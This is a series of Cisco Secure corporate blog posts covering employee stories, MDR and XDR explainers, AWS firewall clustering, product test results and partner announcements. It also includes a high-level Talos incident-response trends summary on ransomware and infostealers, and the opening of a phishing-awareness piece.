O’Melia: What I love most about working at Cisco is the amount of positive contributions we get to have on the world, from solving some of the world’s biggest problems around cybersecurity to giving money and resources to others in need. I also love the feeling of empowerment to create my own work/life balance as Cisco allows me the opportunity to have a flexible schedule.

What has been your career journey within Cisco?

O’Melia: I started at Duo Security in 2017. While working in Field Marketing, I was able to gain experience across many different teams. For example, I worked closely with a region in the U.S. as well as the Managed Service Provider team, which is a global team with a completely different business model. The needs differ greatly, from how we report and track metrics to the messaging and offers from one team to the next. I am now working in a very different market that is much larger and includes many more languages, so that brings a new level of understanding to how we show up in the market to achieve business goals.

Taking the leap to work anywhere

“Stepping outside of my comfort zone is one of my favorite things to do.”

– Laura O’Melia

What prompted you to relocate from Austin, Texas to Sydney, Australia?

O’Melia: Austin is great and was my home for 20 years, but I still wanted to gain international work experience to learn what it would be like somewhere else and compare it to what I know.

Stepping outside of my comfort zone is one of my favorite things to do, so when I heard Duo was expanding internationally and there was an opportunity in Australia, I was immediately interested. Everyone I know that has visited Australia always has absolutely wonderful things to say, so without ever having visited I agreed to take a long-term international two-year assignment.

How has Cisco supported your relocation?

O’Melia: I worked closely with my manager on the process from start to finish. We had the support of Cisco’s Mobility Services team, a group of Cisco employees that help with relocation services. We worked with immigration to obtain my work          visa. I was planning to relocate in March 2020 but as we know, the borders were closed and visas were not being processed for nearly two years. I was already in-role, so continued to support the APJC team from Austin.

When the time came, Cisco had a team of experts that I worked with to pack and ship my belongings and help get set up with an overseas bank. I also worked with a realtor to help me find a place to live, and the team even assists with my U.S. and Australian tax returns while I am away.

How has your work changed since relocating?

O’Melia: My role has expanded from doing lead-gen events for Duo in Australia and New Zealand to now being responsible for driving demand across the APJC region through digital campaigns and other marketing channels. I still strive to provide qualified leads to Sales and educate the market on our offerings. My goal is to help get Cisco Secure solutions into more doors to ultimately give users a better experience and stop the bad actors from doing harm.

What advice do you have for others who want to work from anywhere?

O’Melia: If you get the opportunity, take it. Everyone has their own path, but if you feel your career could benefit, even slightly, from the experience you will gain moving to another country and figuring things out far from what you know today, why not give it a try? You can learn so much from meeting and working with people that have a very different experience than you might know.

Ready for an adventure? If you want to solve global challenges through cybersecurity with the potential to work anywhere, check out our open roles.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Unscrambling Cybersecurity Acronyms – The ABCs of MDR and XDR Security

By Nirav Shah

In the second part of this blog series on Unscrambling Cybersecurity Acronyms, we covered Endpoint Detection and Response (EDR) and Managed Endpoint Detection and Response (MEDR) solutions, which included an overview of the evolution of endpoint security solutions. In this blog, we’ll go over Managed Detection and Response (MDR) and Extended Detection and Response (XDR) solutions in more depth.

What are Managed Detection and Response (MDR) solutions? 

MDR solutions are a security technology stack delivered as a managed service to customers by third-parties such as cybersecurity vendors or Managed Service Providers (MSPs). They’re similar to Managed Endpoint Detection and Response (MEDR) solutions since both solutions are managed cybersecurity services that use Security Operations Center (SOC) experts to monitor, detect, and respond to threats targeting your organization. However, the main difference between these two offerings is that MEDR solutions monitor only your endpoints while MDR solutions monitor a broader environment.

While MDR security solutions don’t have an exact definition for the types of infrastructure they monitor and the underlying security stack that powers them, they often monitor your endpoint, network, and cloud environments via a ‘follow the sun’ approach that uses multiple security teams distributed around the world to continually defend your environment. These security analysts monitor your environment 24/7 for threats, analyze and prioritize threats, investigate potential incidents, and offer guided remediation of attacks. This enables you to quickly detect advanced threats, effectively contain attacks, and rapidly respond to incidents.

More importantly, MDR security solutions allow you to augment or outsource your security to cybersecurity experts. While nearly every organization must defend their environment from cyberattacks, not every organization has the time, expertise, or personnel to run their own security solution. These organizations can benefit from outsourcing their security to MDR services, which enable them to focus on their core business while getting the security expertise they need. In addition, some organizations don’t have the budget or resources to monitor their environment 24/7 or they may have a small security team that struggles to investigate every threat. MDR security services can also help these organizations by giving them always-on security operations while enabling them to address every threat to their organization.

One drawback to deploying an MDR security service is that you become dependent on a third-party for your security needs. While many organizations don’t have any issues with this, some organizations may be hesitant to hand over control of their cybersecurity to a third-party vendor. In addition, organizations such as larger, more-risk averse companies may not desire an MDR service because they’ve already made cybersecurity investments such as developing their own SOC. Finally, MDR security solutions don’t have truly unified detection and response capabilities since they’re typically powered by heterogenous security technology stacks that lack consolidated telemetry, correlated detections, and holistic incident response. This is where XDR solutions shine.

What are Extended Detection and Response (XDR) solutions? 

XDR solutions unify threat monitoring, detection, and response across your entire environment by centralizing visibility, delivering contextual insights, and coordinating response. While ‘XDR’ means different things to different people because it’s a fairly nascent technology, XDR solutions usually consolidate security telemetry from multiple security products into a single solution. Moreover, XDR security solutions provide enriched context by correlating alerts from different security solutions. Finally, comprehensive XDR solutions can simplify incident response by allowing you to automate and orchestrate threat response across your environment.

These solutions speed up threat detection and response by providing a single pane of glass for gaining visibility into threats as well as detecting and responding to attacks. Furthermore, XDR security solutions reduce alert fatigue and false positives with actionable, contextual insights from higher-fidelity detections that mean you spend less time sifting through endless alerts and can focus on the most critical threats. Finally, XDR solutions enable you to streamline your security operations with improved efficiency from automated, orchestrated response across your entire security stack from one unified console.

A major downside to XDR security solutions is that you typically have to deploy and manage these solutions yourself versus having a third-party vendor run them for you. While Managed XDR (MXDR) services are growing, these solutions are still very much in their infancy. In addition, not every organization will want or need a full-fledged XDR solution. For instance, organizations with a higher risk threshold may be satisfied with using an EDR solution and/or an MDR service to defend their organization from threats.

Choosing the Right Cybersecurity Solution  

As I mentioned in the first and second parts of this blog series, you shouldn’t take a ‘one-size-fits-all’ approach to cybersecurity since every organization has different needs, goals, risk appetites, staffing levels, and more. This logic holds true for MDR and XDR solutions, with these solutions working well for certain organizations and not so well for other organizations. Regardless, there are a few aspects to consider when evaluating MDR and XDR security solutions.

One factor to keep in mind is if you already have or are planning on building out your own SOC. This is important to think about because developing and operating a SOC can require large investments in cybersecurity, which includes having the right expertise on your security teams. Organizations unwilling to make these commitments usually end up choosing managed security services such as MDR solutions, which allows them to protect their organization without considerable upfront investments.

Other critical factors to consider are your existing security maturity and overall goals. For instance, organizations who have already made significant commitments to cybersecurity often think about ways to improve the operational efficiency of their security teams. These organizations frequently turn to XDR tools since these solutions reduce threat detection and response times, provide better visibility and context while decreasing alert fatigue. Moreover, organizations with substantial security investments should consider open and extensible XDR solutions that integrate with their existing tools to avoid having to ‘rip and replace’ security tools, which can be costly and cumbersome.

I hope this blog series on the different threat detection and response solutions help you make sense of the different cybersecurity acronyms while guiding you in your decision on the right security solution for your organization. For more information on MDR solutions, read about how Cisco Secure Managed Detection and Response (MDR) rapidly detects and contains threats with an elite team of security experts. For more information on XDR solutions, learn how the Cisco XDR offering finds and remediates threats faster with increased visibility and critical context to automate threat response.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Secure Firewall on AWS: Build resilience at scale with stateful firewall clustering

By Anubhav Swami

Organizations embrace the public cloud for the agility, scalability, and reliability it offers when running applications. But just as organizations need these capabilities to ensure their applications operate where needed and as needed, they also require their security does the same. Organizations may introduce multiple individual firewalls into their AWS infrastructure to produce this outcome. In theory, this may be a good decision, but in practice—this could lead to asymmetric routing issues. Complex SNAT configuration can mitigate asymmetric routing issues, but this isn’t practical for sustaining public cloud operations. Organizations are looking out for their long-term cloud strategies by ruling out SNAT and are calling for a more reliable and scalable solution for connecting their applications and security for always-on protection.

To solve these challenges, Cisco created stateful firewall clustering with Secure Firewall in AWS.

 

Cisco Secure Firewall clustering overview

Firewall clustering for Secure Firewall Threat Defense Virtual provides a highly resilient and reliable architecture for securing your AWS cloud environment. This capability lets you group multiple Secure Firewall Threat Defense Virtual appliances together as a single logical device, known as a “cluster.”

A cluster provides all the conveniences of a single device (management and integration into a network) while taking advantage of the increased throughput and redundancy you would expect from deploying multiple devices individually. Cisco uses Cluster Control Link (CCL) for forwarding asymmetric traffic across devices in the cluster. Clusters can go up to 16 members, and we use VxLAN for CCL.

In this case, clustering has the following roles:

Figure 1: Cisco Secure Firewall Clustering Overview

The above diagram explains traffic flow between the client and the server with the insertion of the firewall cluster in the network. Below defines the roles of clustering and how packet flow interacts at each step.

 

Clustering roles and responsibilities 

Owner: The Owner is the node in the cluster that initially receives the connection.

    • The Owner maintains the TCP state and processes the packets. 
    • A connection has only one Owner. 
    • If the original Owner fails, the new node receives the packets, and the Director chooses a new Owner from the available nodes in the cluster.

Backup Owner: The node that stores TCP/UDP state information received from the Owner so that the connection can be seamlessly transferred to a new owner in case of failure.

Director: The Director is the node in the cluster that handles owner lookup requests from the Forwarder(s). 

    • When the Owner receives a new connection, it chooses a Director based on a hash of the source/destination IP address and ports. The Owner then sends a message to the Director to register the new connection. 
    • If packets arrive at any node other than the Owner, the node queries the Director. The Director then seeks out and defines the Owner node so that the Forwarder can redirect packets to the correct destination. 
    • A connection has only one Director. 
    • If a Director fails, the Owner chooses a new Director.

Forwarder: The Forwarder is a node in the cluster that redirects packets to the Owner. 

    • If a Forwarder receives a packet for a connection it does not own, it queries the Director to seek out the Owner 
    • Once the Owner is defined, the Forwarder establishes a flow, and redirects any future packets it receives for this connection to the defined Owner.

Fragment Owner: For fragmented packets, cluster nodes that receive a fragment determine a Fragment Owner using a hash of the fragment source IP address, destination IP address, and the packet ID. All fragments are then redirected to the Fragment Owner over Cluster Control Link.  

 

Integration with AWS Gateway Load Balancer (GWLB)

Cisco brought support for AWS Gateway Load Balancer (Figure 2). This feature enables organizations to scale their firewall presence as needed to meet demand (see details here).

Figure 2: Cisco Secure Firewall and AWS Gateway Load Balancer integration

 

Cisco Secure Firewall clustering in AWS

Building off the previous figure, organizations can take advantage of the AWS Gateway Load Balancer with Secure Firewall’s clustering capability to evenly distribute traffic at the Secure Firewall cluster. This enables organizations to maximize the benefits of clustering capabilities including increased throughput and redundancy. Figure 3 shows how positioning a Secure Firewall cluster behind the AWS Gateway Load Balancer creates a resilient architecture. Let’s take a closer look at what is going on in the diagram.

Figure 3: Cisco Secure Firewall clustering in AWS

Figure 3 shows an Internet user looking to access a workload. Before the user can access the workload, the user’s traffic is routed to Firewall Node 2 for inspection. The traffic flow for this example includes:

User -> IGW -> GWLBe -> GWLB -> Secure Firewall (2) -> GLWB -> GWLBe -> Workload

In the event of failure, the AWS Gateway Load Balancer cuts off existing connections to the failed node, making the above solution non-stateful.

Recently, AWS announced a new feature for their load balancers known as Target Failover for Existing Flows. This feature enables forwarding of existing connections to another target in the event of failure.

Cisco is an early adaptor of this feature and has combined Target Failover for Existing Flows with Secure Firewall clustering capabilities to create the industry’s first stateful cluster in AWS.

aws
Figure 4: Cisco Secure Firewall clustering rehashing existing flow to a new node

Figure 4 shows a firewall failure event and how the AWS Gateway Load Balancer uses the Target Failover for Existing Flows feature to switch the traffic flow from Firewall Node 2 to Firewall Node 3. The traffic flow for this example includes:

User -> IGW -> GWLBe -> GWLB -> Secure Firewall (3) -> GLWB -> GWLBe -> Workload

 

Conclusion

Organizations need reliable and scalable security to protect always-on applications in their AWS cloud environment. With stateful firewall clustering capabilities from Cisco, organizations can protect their applications while maintaining cloud benefits such as agility, scalability, and reliability.

Cisco Secure Firewall Threat Defense Virtual is available in the AWS marketplace, providing features like firewalling, application visibility & control, IPS, URL filtering, and malware defense. Cisco offers flexible options for firewall licensing, such as pay-as-you-go (PAYG) and bring-your-own-license (BYOL). To learn more about how Cisco Secure Firewall clustering capabilities can help protect your AWS applications, see our additional resources, check out our 30-day free trial, or speak to your Cisco sales representative.

 

Additional Resources 

Cisco Secure Firewall Clustering in the Cloud

Building a Scalable Security Architecture on AWS with Cisco Secure Firewall and AWS Gateway Load Balancer

Introducing AWS Gateway Load Balancer Target Failover for Existing Flows

Secure Firewall for Public Cloud webpage


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Secure Endpoint Crushed the AV-Comparative EPR Test

By Truman Coburn

The word is out! Cisco Secure Endpoint’s effectiveness is off the charts in protecting your enterprise environment.

This is not just a baseless opinion; however, the facts are rooted in actual test results from the annual AV-Comparative EPR Test Report published in October 2022. Not only did Secure Endpoint knock it out of the park in enterprise protection; but Cisco Secure Endpoint obtained the lowest total cost of ownership (TCO) per agent at $587 over 5 years. No one else was remotely close in this area. More to come on that later.

If you are not familiar with the “AV-Comparatives Endpoint Prevention and Response Test is the most comprehensive test of EPR products ever performed. The 10 products in the test were subjected to 50 separate targeted attack scenarios, which used a variety of different techniques.”

These results are from an industry-respected third-party organization that assesses antivirus software and has just confirmed what we know and believe here at Cisco, which is our Secure Endpoint product is the industry’s best of the best.

Leader of the pack

Look for yourself at where we landed. That’s right, Cisco Secure Endpoint smashed this test, we are almost off the quadrant as one of the “Strategic Leaders”.

We ended up here for a combination of reasons, with the top being our efficacy in protecting our customers’ environments in this real-world test that emulates multi-stage attacks similar to MITRE’s ATT&CK evaluations which are conducted as part of this process (click here for an overview of MITRE ATT&CK techniques). Out of all the 50 scenarios tested, Secure Endpoint was the only product that STOPPED 100% of targeted threats toward enterprise users, which prevented further infiltration into the organization.

Lowest Total Cost of Ownership

In addition, this test not only assesses the efficacy of endpoint security products but also analyzes their cost-effectiveness. Following up on my earlier remarks about achieving the lowest cost of ownership, the graph below displays how we stacked up against other industry players in this space including several well-known vendors that chose not to display their names due to poor results.

These results provide a meaningful proof point that Cisco Secure Endpoint is perfectly positioned to secure the enterprise as well as secure the future of hybrid workers.

Enriched with built-in Extended Detection and Response (XDR) capabilities, Cisco Secure Endpoint has allowed our customers to maintain resiliency when faced with outside threats.

As we embark on securing “what’s next” by staying ahead of unforeseen cyber threats of tomorrow, Cisco Secure Endpoint integration with the complete Cisco Secure Solutions portfolio allows you to move forward with the peace of mind that if it’s connected, we can and will protect it.

Secure Endpoint live instant demo

Now that you have seen how effective Secure Endpoint is with live real-world testing, try it for yourself with one of our live instant demos. Click here to access instructions on how to download and install your demo account for a test drive.

Click here to see what analysts, customers, and third-party testing organizations have to say about Cisco Secure Endpoint Security efficacy, easy implementation and overall low total cost of ownership for their organization —and stay ahead of threats.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Employee Volunteers Enrich Communities From the Farm to the Theatre and Beyond

By Mary Kate Schmermund

Cisconians delight in contributing to their communities in a variety of ways including at the local theatre, farm and library. Cisco’s paid Time2Give benefit encourages team members to volunteer at the places where their passions thrive.

How should you decide where to get involved? Customer Success Program Manager Kate Pydyn advises: “Find something that speaks to your passion while giving back. There are so many opportunities that involve being outdoors, crafting, teaching skills you’ve developed, telling stories or providing comfort.”

With ten paid days a year to give, these Cisconians demonstrate that building relationships with people, the arts and the earth can increase fulfillment, connection and community.

Harvesting good will

Urban farming is an issue very close to the heart of Petra Hammerl, a senior enterprise customer success manager who works on Duo Security. Hammerl frequently volunteers at Farm City Detroit, part of Detroit Blight Busters. Using Time2Give, Hammerl has shared the experience by “bringing a crew of awesome co-workers which has been amazing and a lot of fun,” she said.

Petra Hammerl, Kate Pydyn and Emily Gennrich give their time at Farm City Detroit

“It felt great to take action! There are so many problems in the world, and I often feel powerless to make a difference. What I did was small, but with all of the volunteers together, the work that was done makes a real difference in the lives of my neighbors.” – Kate Pydyn

Pydyn and Emily Gennrich, a manager of operations for security customer success at Cisco Secure, joined in on the fun by contributing to multiple facets of gardening from weeding to harvesting food. “It felt great to take action! There are so many problems in the world, and I often feel powerless to make a difference. What I did was small, but with all of the volunteers together, the work that was done makes a real difference in the lives of my neighbors,” Pydyn said.

Community connections at the library

Senior Communications Manager, Brand Strategy & Design at Cisco Secure Chrysta Cherrie spent her Time2Give as a sighted assistant at the VISIONS vendor fair, hosted at the Ann Arbor District Library Downtown. “I was really happy to take some time to volunteer at the VISIONS vendor fair for people who are blind, visually impaired or physically disabled,” Cherrie said.

Learning how to be a sighted assistant was “a reminder that we can do more when we can rely on each other. Taking the time to better understand how someone makes their way through life gives you a chance to build empathy,” Cherrie said. She escorted attendees around the event where exhibitors offered products and services like electronic readers, leader dogs and transportation. There were also talks throughout the day and Cherrie helped attendees navigate between the presentation and vendor areas.

Meeting attendees of the VISIONS vendor fair and experiencing how meaningful the event is also moved Cherrie. The fair “brings out folks throughout southeast Michigan, so there’s a good chance that the person you’re assisting will run into some friends, and getting to see people connect like that can’t help but make you feel good,” Cherrie said.

Lights up on employee volunteers

Jenny Callans, a senior design researcher who works on Duo Security, serves as the chair of the Friends of the Detroit Film Theatre’s Auxiliary, a part of the Detroit Institute of Arts. “We support the mission of the Friends of the Detroit Film Theatre to make great niche films accessible to audiences,” she said. To do that, the organization is responsible for building a community of film fans and overseeing how donations are spent.

Volunteer

For Callans, the most meaningful part of using Time2Give to support the FDFT and the DIA is sharing her love of film with others. Time2Give supports her duties as FDFT chair, and gives her a sense of connection when she’s visiting the DFT to take in a movie. “Sitting in a theatre next to my young adult son, but surrounded by strangers watching a film that is unusual or unexpected but which moves me and challenges me to think is the best part hands-down,” Callans said.

Employee volunteer program multiplies impact

From supporting youth to volunteering at community hubs, Time2Give “is a fantastic opportunity to have a long-lasting, meaningful relationship with your community by volunteering as a board or committee member! Having a long-term presence with an org is amazingly impactful, for you and for the organization,” Callans said.

Time2Give is one of Cherrie’s favorite things about working at Cisco. She says, “Take advantage of the opportunity! Time2Give is a great way to give back to your community and the people and causes that you care about.”

Stay tuned for more posts celebrating the community engagement Time2Give fosters and check out our open roles to join in on giving back.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Partner Summit 2022: Let’s Own the Opportunity to Build a World of Secure, Resilient Organizations

By Shailaja Shankar

It’s Partner Summit week and, for me, it’s an important reminder that no one company, not even Cisco, can do it alone. Our partners provide diverse perspectives, expertise, and solutions offerings. Each partner plays a key part in delivering the outcomes and experiences our customers need, want, and expect. So, when we say, “Let’s Own It”, it’s a rally cry for Cisco and our partners alike to do our parts to seize the massive opportunity that we have in front of us and turn it into mutual success.

Together, I know we can achieve amazing things. Foremost on my mind right now is both the opportunity and necessity to empower customers with security resilience. Resilience means customers can protect the integrity of every aspect of their business so that they can withstand unpredictable threats or changes and emerge stronger. It’s about providing controlled, trusted access to applications and services, at any time, from any place.

Resilience can also help customers deal with issues the moment they arise. If changes are needed, they will have the visibility to determine priorities, thanks to actionable intelligence and insight in the face of some major security realities that they are dealing with every day.

One, businesses are more interconnected, meaning that a breach on anyone in the value chain has dramatic ripple effects on the others.

Two, security attacks are becoming more personalized. Individuals remain one of the easiest targets for cybercriminals and their attacks are becoming more sophisticated and customized for the individual.

Three, hybrid work is here to stay. People around the world will continue to work from anywhere, on managed and unmanaged devices, over secured and unsecured networks, to applications spread across multiple clouds and data centers.

Innovating to win: Summary of Partner Summit announcements

Our vision for enabling a more resilient organization is the Cisco Security Cloud. It’s an open, integrated security platform that will protect the integrity of entire IT ecosystems by safeguarding users, devices and applications across public clouds and private data centers, without public cloud lock-in. Delivering on the Security Cloud is part of our long-term product strategy; but the innovations we are announcing at Partner Summit this week are foundational elements that execute on this vision.

Specifically, we are announcing new solutions and technologies across our portfolio in Secure Connectivity, Network Security, and Zero Trust. I encourage all partners to drill down on each announcement in the accompanying blogs and news announcements. But here are the highlights of the announcements.

Secure Access by Duo

Helping increase resistance to phishing attacks and improve user experience through frictionless access using Duo Passwordless, which is now generally available with support for Duo Mobile as a passwordless authenticator.

Secure Firewall 3100 Series

Expanding the Cisco Secure Firewall 3100 series, the first firewall purpose-built for hybrid work, with the Secure Firewall 3105, ideal for branch office and similar use cases focused on performance at a competitive price point.

Secure Connectivity Enhancements

Strengthening Umbrella’s data loss prevention (DLP) capabilities by adding API-based enforcement and unified reporting to protect sensitive data, e.g., intellectual property and financial and healthcare information. This complements Umbrella’s current inline-DLP functionality and collectively forms multi-mode DLP.

Cloud Application Security

New Secure Workload capabilities delivering policy-as-code workload security for cloud-native and public-cloud application development. Common use cases for policy-as-code include access control to infrastructure and simplifying enterprise compliance and controls.

Our partner enablement commitments

Our strategy and our innovation roadmap are all designed to set you up, our partners, for long-term success. In addition, we are committed to several partner enablement programs to help you deliver more value to customers and to help you become more profitable. Examples include:

  • Simplifying how you do business with Cisco: We are taking active steps to simplify the ease of doing business with Cisco Secure in ways that accelerate your velocity and scaling our growth through the channel. We are continuing to invest in our partners’ programs, offers, and expanding our routes to market so that our partners can be more profitable with Cisco Secure.
  • Compelling offers and promotions: Recent examples include “One Year on Us” that we expanded to include the complete SaaS and recurring software subscription portfolio. Specifically, partners can offer customers preferential pricing with 1-year free with a 3-year subscription purchase.
  • Investment in awareness: We want customers to ask for Cisco Secure by name, so we are aggressively investing in brand awareness. This includes a new secure the enterprise campaign “if it’s connected, it’s protected” designed to strengthen Cisco’s market perception as a world-class security solutions provider. We are also planning to back this up by investing more than $50 million in paid digital marketing specifically for security over the next year.

How you can own this week

Partner Summit is for you. So, my call-to-action is for you to maximize the value you get out of this week by attending as many of the informative, high-impact security sessions many teams worked hard to create. I am really looking forward to meeting as many of you as possible – on the expo floor, at the sessions, or in our 1-on-1 meetings.

Security has never been more critical and the need for resiliency is a requirement for virtually every business. The time for us to own it and innovate to win this future together has never been better.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Secure Workload: Policy-as-Code Is a Win-Win for Everyone

By Brijeshkumar Shah

The last few years have proved to be a catalyst for digital transformation for many of our enterprise customers. Application modernization and adopting multicloud are the foundational building blocks for digitizing business. Customers employ CI/CD (continuous integration, continuous delivery) to modernize their applications, building them on a cloud infrastructure. This evolution has given rise to new application security challenges in terms of speed, scale, as well as new and unfamiliar control points – not to mention siloed organizations and tools.

To address these security challenges, Cisco Secure Workload delivers zero trust microsegmentation in an infrastructure, location, and form factor agnostic way. It safeguards application workloads, wherever they live across the hybrid and multicloud environment. The recent release of Secure Workload 3.7 introduces “policy as code” support – delivering security at the speed of DevOps. It enables Secure Workload to be integrated with the customer’s choice of CI/CD toolchains, such as Jenkins or GitLab, and ingest the application security policy during the build phase of the application. Secure Workload then renders the policies onto the relevant workloads when the application goes live.

As the graphic below illustrates, Secure Workload ingests policies using Terraform or Ansible, which are widely adopted tools used by the DevOps team to automate infrastructure related tasks. Secure Workload integrates with the CI/CD toolchains using a YAML (.yml) manifest to ingest the policy. It then programs the same policies to the relevant enforcement point to achieve least privilege access for the newly built or upgraded application.

 

Secure Workload Policy as Code example

 

Policy as code helps customers automate policy deployment at the speed and scale of modern applications. It also simplifies collaboration between DevOps/DevSecOps and NetSec teams. The policies are written in the application language and give appropriate controls to developers to write their requirements into the application while the NetSec team ensures full compliance to the infosec policies dictated by the CISO organization.

In summary, Secure Workload removes the barriers to achieving automated application deployment across highly distributed multicloud environments, without compromising security, compliance, or user experience. The result – stronger security, faster application deployment, and more efficient collaboration.

For more information on policy as code, contact your Cisco Account Team or Partner Account Manager.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

ThreatWise TV: Exploring Recent Incident Response Trends

By Ben Nahorney

Today we’re examining some of the revelations in the Q3 Cisco Talos Incident Response Trends Report. This document is an anonymized look at of all the engagements that the Cisco Talos Incident Response team have been involved in over the previous three months. It also features threat intelligence from our team of researchers and analysts.  

To start, take a watch of this episode of ThreatWise TV which explores how these trends have evolved since the previous quarter. Our guests also talk about incidents and cyber-attacks that they themselves have consulted on recently, including a particularly interesting insider threat case. 

Highlights of the Q3 Cisco Talos Incident Response report 

Ransomware returned as the top threat this quarter, after commodity trojans narrowly surpassed ransomware last quarter. Ransomware made up nearly 18 percent of all threats observed, up from 15 percent last quarter. Cisco Talos Incident Response (CTIR) observed high-profile families, such as Vice Society and Hive, as well as the newer family Blast Basta, which first emerged in April of this year.   

Also noteworthy is the fact that CTIR saw an equal number in ransomware and pre- ransomware engagements this quarter, totalling nearly 40 percent of threats observed. Pre-ransomware is when we have observed a ransomware attack is about to happen, but the encryption of files has not yet taken place. 

Pre-ransomware comprised 18 percent of threats this quarter, up from less than 5 percent previously. While it’s difficult to determine an adversary’s motivations if encryption does not take place, several behavioral characteristics bolster Talos’ confidence that ransomware may likely be the final objective. In these engagements adversaries were observed deploying frameworks such as Cobalt Strike and Mimikatz, alongside numerous enumeration and discovery techniques.  

Commodity malware, such as the Qakbot banking trojan, was observed in multiple engagements this quarter. In one engagement, several compromised endpoints were seen communicating with IP addresses associated with Qakbot C2 traffic. This activity coincides with a general resurgence of Qakbot and its delivery of emerging ransomware families and offensive security frameworks that we have not previously observed Qakbot deploy. This comes at a time where competing email-based botnets like Emotet and Trickbot have suffered continued setbacks from law enforcement and tech companies.  

Other threats this quarter include infostealers like Redline Stealer and Raccoon Stealer. Redline Stealer was observed across three engagements this quarter, two of which involved ransomware. The malware operators behind Raccoon introduced new functionality to the malware at the end of June, which likely contributed to its increased presence in engagements this quarter.  

As infostealers have continued to rank highly in CTIR engagements, let’s explore them in a bit more detail. 

Why infostealers proliferate  

Throughout the incidents discussed over the last few quarters, and CTIR engagements in general, information stealing plays a big part of the attackers’ TTPs.   

From a high level, infostealers can be used to gain access a variety of sensitive information, such as contact information, financial details, and even intellectual property. The adversaries involved often proceed to exfiltrate this information and may then attempt to sell it in dark web forums, threaten to release it if a ransom isn’t paid, among other things.  

While these instances can and do crop up in CTIR engagements, many of the infostealers seen in this space are used for accessing and collecting user credentials. Once an attacker has gained an initial foothold on a system, there are many places within an operating system that they can look for and collect credentials through the practice of credential dumping.   

These stolen credentials may be offered up for sale on the dark web, alongside the stolen information mentioned above, but they can also prove to be a key weapon in an attacker’s arsenal. Their usefulness lies in one simple concept—why force your way into a system when you can just log in?  

There are several advantages for bad actors that use this approach. Probably the most oblivious of these is that using pre-existing credentials is far more likely to go unnoticed than other more flagrant tactics an attacker can use. If part of the goal of an attack is to remain under the radar, activities carried out by “known users” are less likely to trigger security alerts when compared to tactics such as exploiting vulnerabilities or downloading malware binaries.  

Adversaries tend to seek credentials with higher privileges, allowing them further control over the systems they compromise, with those including administrative access being the crown jewels.  

User credentials can not only provide an attacker with means to elevate privileges and establish persistence on a system, but also to move laterally through a network. Some credentials, especially those with administrative privileges, can offer access to multiple systems throughout a network. By obtaining them, many more options become available to further an attack.  

Repeat offenders  

There are several threats involved in information stealing that appear repeatedly in CTIR engagements over the last few quarters.  

Perhaps the most notorious is Mimikatz—a tool used to pull credentials from operating systems. Mimikatz is not malware per-se and can be useful for penetration testing and red team activities. But bad actors leverage it as well, and over the last few quarters CTIR has observed it being used in ransomware-as-a-service attacks, as well as pre-ransomware incidents.   

CTIR has also observed Redline Stealer being utilized by adversaries in CTIR engagements across quarters. This infostealer has grown in popularity as a supplementary tool used alongside other malware. On more than one occasion, CTIR has identified stolen credentials on the dark web that claimed to have been obtained via Redline Stealer.  

Other information stealers seen across the last few quarters include the Vidar information stealer, Raccoon Stealer, and SolarMaker, all of which have been used to further an adversary’s attacks.   

Insider threats 

Over the last several months, Talos has seen an increasing number of engagements involving insider threats. In one engagement this quarter, passwords were reset through a management console of a perimeter firewall that a disgruntled employee had access to.   

The organization’s team changed all associated passwords but overlooked one administrative account. On the following day, someone logged in using that account, deleted all other accounts and firewall rules, and created one local account, likely to provide persistence.  

You’ll hear Alexis Merritt, Incident Response Consultant for Cisco Talos, talk about this more in the ThreatWise TV episode. 

To help protect against this threat when an individual leaves an organization, steps like disabling accounts and ensuring that connections to the enterprise remotely through VPN has been removed can be very valuable. Implementing a mechanism to wipe systems, especially for remote employees, is important as well.  

For more on this topic, Cisco Secure recently put together a white paper on the Insider Threat Maturity FrameWork.

How to protect  

In several incidents over the last few quarters that involved information stealers, multi-factor authentication (MFA) was not properly implemented by the organizations impacted, providing adversaries an opportunity to infiltrate the networks. MFA tools like Cisco Secure Access by Duo can prevent attackers from successfully gaining access. 

Connecting with Wolfgang Goerlich 

And finally, Cisco Advisory CISO Wolfgang Goerlich has created this storytelling video, to help people think about incident response in a new way: 


Join the Cisco Talos Incident Response team for a live debrief of the Q3 report on 27th October. 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

How can I help protect my company from phishing attacks?

By Greg Barnes

I’m sure you’ve seen them — emails or messages that sound alarming and ask you to act quickly. We live in a digital world that produces hundreds of messages and alerts every day. It’s often hard to determine the validity of a suspicious message or phishing email. Whether you are an administrator, or an end-user, it can be overwhelming to accurately identify a malicious message. When in doubt, here are some questions you should ask yourself:

Is the message from a legitimate sender?

Do I normally receive messages from this person?

If there’s a link, can I tell where it’s sending me?

Attackers continue to evolve their methods, and they’re highly educated on the defenses they come up against in the wild. They’ll craft messages that do not involve any traditional indicators of compromise, such as domains, IP address, or URL links. They’ll also start their attacks by sending messages as an initial lure to establish trust, before sending an email with altered invoice or one claiming to be a helpless employee attempting to get their payroll fixed.

Phishing is a socially-based attack type, one where the threat actors focus on human behavior. When these attacks target organizations, there are multiple levels of attack at play. One that focuses on behavioral patterns and workflow, and the other centers on the victim’s emotional boundaries, such as targeting their desire to help others. You see this pattern frequently in Business Email Compromise (BEC) attacks.

